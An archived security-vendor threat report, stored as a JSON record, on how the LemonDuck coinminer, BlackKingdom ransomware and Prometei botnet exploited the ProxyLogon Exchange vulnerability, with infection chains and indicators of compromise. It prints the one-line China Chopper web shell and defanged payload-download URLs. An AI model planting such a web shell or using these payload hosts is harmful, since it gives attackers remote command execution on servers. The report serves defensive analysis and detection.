{
	"id": "a1f4e5c2-b285-465c-8a7a-2919c5976f5b",
	"created_at": "2026-04-06T00:15:59.273539Z",
	"updated_at": "2026-04-10T03:22:06.237165Z",
	"deleted_at": null,
	"sha1_hash": "2dfff56b76e700de011bca3be1985e5a51da5457",
	"title": "Proxylogon: A Coinminer, a Ransomware, and a Botnet Join the Party",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 641765,
	"plain_text": "Proxylogon: A Coinminer, a Ransomware, and a Botnet Join the Party\r\nPublished: 2021-05-06 · Archived: 2026-04-05 19:11:59 UTC\r\nThe emergence of several zero-day exploits relating to ProxyLogon, a Microsoft Exchange Server vulnerability that was\r\ndiscovered in late 2020open on a new tab, has allowed several threat actors to carry out attacks against unpatched systems.\r\nOur telemetry showed three malware families taking advantage of the ProxyLogon vulnerability beginning in March: the\r\ncoinminer LemonDuck was sighted first, quickly followed by the ransomware BlackKingdom, then the Prometei botnet\r\n(Figure 1).\r\nFigure 1. The malware infection chains of BlackKingdom, Prometei, and LemonDuck\r\nLeveraging the ProxyLogon vulnerability allowed the threat actors behind BlackKingdom, Prometei, and LemonDuck to\r\nexecute Chopper web shells (detected by Trend Micro as Backdoor.JS.CHOPPER.SMYCBCD and\r\nTrojan.ASP.CVE202126855.SM), which then led to the deployment of the final payload in their respective infections. The\r\nChina Chopper web shell, which was first discovered in 2012, continues to be widely used by threat actors in their\r\ncampaigns to gain remote access to a targeted system. It's recently been found in many ransomware families, such as Hello\r\nransomware.\r\nOnce they have compromised a system, these can start deploying malicious activities, such as dropping ExchDefender.exe, a\r\nbinary file seen in BlackKingdom and Prometei cases, or using a WMI modifier that leads to a LemonDuck infection.\r\nBlackKingdom and Prometei infections\r\nBoth BlackKingdom (detected by Trend Micro as Ransom.Win64.BLACKKINGDOM) and Prometei (detected as\r\nBackdoor.Win64.PROMETEI, TrojanSpy.Win32.PROMETEI, Coinminer.Win64.MALXMR, and\r\nCoinminer.Win64.TOOLXMR) infections make use of ExchDefender.exe, which copies itself to a Windows folder. It then\r\ncreates MSExchangeDefenderPL, a service that contains its main routine and poses as security software for Microsoft\r\nExchange (Figure 2). This service will execute the binary file in the Windows folder with the command line “Dcomsvc”\r\n(Figure 3). \r\nhttps://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html\r\nPage 1 of 5\n\nFigure 2. Code snippet of the installation of MSExchangeDefenderPL\r\nFigure 3. Code snippet of the Dcomsvc command\r\nMSExchangeDefenderPL will then start enumerating files contained in this folder: \r\nC:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth.\r\nIt searches this directory for files related to web shells used in other attacks and deletes them to make sure it’s the only\r\nremaining malware in the system (Figure 4). These files are as follows:\r\nExpiredPassword.aspx\r\nfrowny.aspx\r\nlogoff.aspx\r\nlogon.aspx\r\nOutlookCN.aspx\r\nRedirSuiteServiceProxy.aspx\r\nsignout.aspx\r\nSvmFeedback.aspx\r\nFigure 4. Code snippet of the files to be deleted by MSExchangeDefenderPL\r\nAt this point, both BlackKingdom and Prometei will leverage the ProxyLogon vulnerability to deploy the Chopper web shell\r\nusing a builder that modifies the Offline Address Book (OAB). Once the OAB has undergone the malicious modifications\r\nand is launched, an .ASPX web shell is created via JavaScript on the system (Figure 5). It will then connect to the virtual\r\npath to initialize the malicious web shell (Figure 6). \r\nhttps://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html\r\nPage 2 of 5\n\nFigure 5. JavaScript code snippet that creates the web shell\r\nFigure 6. Code snippet that executes the .ASPX web shell\r\nLemonDuck infections\r\nSimilarly, LemonDuck (detected by Trend Micro as Trojan.PS1.LEMONDUCK) capitalizes on the ProxyLogon bug to\r\ntarget systems, but its infection utilizes Windows Management Instrumentation (WMI) to modify the OAB. In one such\r\nWMI entry, we have observed a PowerShell process that executes a Base64-encoded command (Figure 7). Deobfuscating\r\nthe command revealed that it’s capable of modifying the ExernalUrl parameter of a specific .ASPX file (Figure 8).\r\nFigure 7. The deobfuscated PowerShell\r\nFigure 8. The modified ExernalUrl parameter of an .ASPX file\r\nThis enables the remote execution of commands once the .ASPX file is loaded, a common technique used by China\r\nChopper. The command that executes the Chopper is as follows:\r\n\u003cscript language=\"JScript\" runat=\"server\"\u003efunction Page_Load(){/*Exchange\r\nService*/eval(Request[\"unsafe\"],\"unsafe\");}\u003c/script\u003e\r\nChina Chopper is a web shell that’s capable of receiving and executing backdoor commands. In this case, it drops the\r\npayload for the LemonDuck malware.\r\nTrend Micro solutions\r\nTrend Micro’s comprehensive XDRproducts solution applies the most effective expert analytics to the deep data sets\r\ncollected from Trend Micro solutions across the enterprise — including email, endpoints, servers, cloud workloads, and\r\nhttps://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html\r\nPage 3 of 5\n\nnetworks — making faster connections to identify and stop attacks. Powerful artificial intelligence and expert security\r\nanalytics correlate data from customer environments and Trend Micro’s global threat intelligence to deliver fewer, higher-fidelity alerts, leading to better, early detection. One console with one source of prioritized, optimized alerts supported with\r\nguided investigation simplifies the steps needed to fully understand the attack path and impact on the organization.\r\nIndicators of compromise\r\nSHA256 Filename Trend Micro Detection\r\na99f8ef649a65ecaf2c1298f03598b4fb3f1b17939cbe58b0117d566059731b4 ExchDefender.exe Trojan.Win32.UNDEFENDEX.Y\r\n16ae11e3ff6cd8daaa20dc3de03b05d49655278518d95c89750731539e606b0e ChackPassAS.aspx Trojan.ASP.CHOPPER.YPBDV\r\n806577311a873579a07445d0d7cdb7b2847dccdb306680563659d9fca7382708 YPEvQuXw.aspx  Trojan.ASP.CVE202126855.SM\r\nd6ec34cdc7aa8c6199e3c017798b1c0fcb9c686a3e1d2c2d90683e1d63a6ae46 App_Web_kjvc3xzm.dll Backdoor.MSIL.CHOPPER.YABC\r\nfcd3639277fa46bfcb7678d849bad50954caff4823b38b144a7e7b2ceb1e4b5d sqhost.exe Backdoor.Win64.PROMETEI.YE\r\nf0a5b257f16c4ccff520365ebc143f09ccf233e642bf540b5b90a2bbdb43d5b4 zsvc.exe Backdoor.Win64.PROMETEI.YE\r\ne4bd40643f64ac5e8d4093bddee0e26fcc74d2c15ba98b505098d13da22015f5 rdpcIip.exe TrojanSpy.Win32.PROMETEI.YE\r\nd811b21ac8ab643c1a1a213e52c548e6cb0bea51ca426b75a1f5739faff16cbd m6.exe Coinminer.Win64.TOOLXMR.SM\r\n6be5847c5b80be8858e1ff0ece401851886428b1f22444212250133d49b5ee30 WindowsUpdate.exe Trojan.Win32.COBALT.AX\r\n81a6de094b78f7d2c21eb91cd0b04f2bed53c980d8999bf889b9a268e9ee364c conhost.exe Coinminer_CryptoNight.SM-WIN\r\nfb8f100e646dec8f19cb439d4020b5f5f43afdc2414279296e13469f13a018ca miwalk.exe HackTool.Win64.MIMIKATZ.EN\r\nb9dbdf11da3630f464b8daace88e11c374a642e5082850e9f10a1b09d69ff04f jfkzhluonvbxicy.exe Ransom.Win64.BLACKKINGDO\r\nc3c786616d69c1268b6bb328e665ce1a5ecb79f6d2add819b14986f6d94031a1 mail.jsp Trojan.PS1.LEMONDUCK.YPBD\r\n4ea66b41ac0e72976b42af9f0f7961f73c8eff3a1d9a3fd7e0dc7032bf4a488e a.jsp Trojan.PS1.LEMONDUCK.YXB\r\n2eb24fb51aad7e6d556eac8276f71321a32c866225a2883e7cd4a5f22f25669b if_mail.bin Trojan.PS1.LEMONDUCK.YXB\r\nb660aa7aca644ba880fdee75f0f98b2db3b9b55978cc47a26b3f42e7d0869fff m6.bin Trojan.PS1.LEMONDUCK.YXA\r\nbc3835feff6f2b3b6a8da238b87b42dad05230d2fc40aefa1749477d6e232b78 m6g.bin Trojan.PS1.LEMONDUCK.YXB\r\nhttps://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html\r\nPage 4 of 5\n\n42012af7555dd2f3413161474bed658cf25b730a5354255e53cfa6cc2e0f646e kr.bin Trojan.PS1.LEMONDUCK.YXA\r\n317799c3e17b493625c600bac3e42d5f1f4c175915468400779679f0cf538bbc if.bin Worm.PS1.LEMONDUCK.YXBC\r\nhxxp://p1[.]feefreepool[.]net/cgi-bin/prometei[.]cgi?r=8\u0026i=LAP057RQRL1WU541\r\nhxxp://173[.]249[.]19[.]202:1337/xmr64[.]exe\r\nhxxp://t[.]netcatkit[.]com/mail[.]jsp?mail\r\nTags\r\nSource: https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html\r\nhttps://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html"
	],
	"report_names": [
		"proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434559,
	"ts_updated_at": 1775791326,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2dfff56b76e700de011bca3be1985e5a51da5457.pdf",
		"text": "https://archive.orkl.eu/2dfff56b76e700de011bca3be1985e5a51da5457.txt",
		"img": "https://archive.orkl.eu/2dfff56b76e700de011bca3be1985e5a51da5457.jpg"
	}
}